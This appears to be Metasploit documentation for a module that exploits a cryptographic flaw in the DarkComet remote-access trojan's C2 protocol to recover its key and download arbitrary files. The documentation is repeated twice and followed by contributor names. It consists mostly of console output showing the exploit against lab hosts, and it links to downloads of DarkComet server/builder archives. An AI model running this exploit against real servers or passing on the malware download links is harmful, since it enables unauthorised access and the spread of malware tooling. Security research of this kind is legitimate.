(https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf) which allows
an attacker to download arbitrary files from the DarkComet C2. The vulnerability possibly affects versions
prior to 3.2 as well. The vulnerability can be exploited without knowledge of the shared secret key
by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing
for key recovery, after which the exploit can be used to download arbitrary files from a DarkComet C2 server.
See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.
See https://mega.nz/#!wlZkSJLK!NI_Z-9UoPBQ0MDEYXLVr1wUJyVV70qVprWqSUol_53k
for the DarkComet 5.3.1 C2 server / builder
See https://mega.nz/#!AxRmkQLb!MVjwua3qrzgyXq7vUWSxISwVE7vQ8rEJbexieb8s0Ro
for the DarkComet 4.2F C2 server / builder (archive password is 'tr')
## Console output
Below is an example of the exploit running against versions 5.3.1 and 4.2F
(DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker).
### Version 5.3.1 (unknown password)
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST 0.0.0.0 yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass
KEY => #KCMDDC51#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
### Version 4.2F (unknown password)
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST 0.0.0.0 yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false
NEWVERSION => false
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - Missing 1 bytes of keystream ...
[*] 192.168.0.104:1604 - Initiating brute force ...
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass
KEY => #KCMDDC42F#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
(https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf), possibly affecting
earlier versions as well. The vulnerability can be exploited without knowledge of the secret key
by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing
for key recovery after which the exploit can be used to download arbitrary files from a DarkComet C2 server.
See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.
## Console output
Below is an example of the exploit running against versions 5.3.1 and 4.2F
(DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker).
### Version 5.3.1 (unknown password)
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST 0.0.0.0 yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass
KEY => #KCMDDC51#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
### Version 4.2F (unknown password)
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST 0.0.0.0 yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false
NEWVERSION => false
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - Missing 1 bytes of keystream ...
[*] 192.168.0.104:1604 - Initiating brute force ...
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass
KEY => #KCMDDC42F#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
William Webb
samvartaka
wchen-r7
Brent Cook
join-us
Jon Hart
James Lee
Adam Cammack
Christian Mehlmauer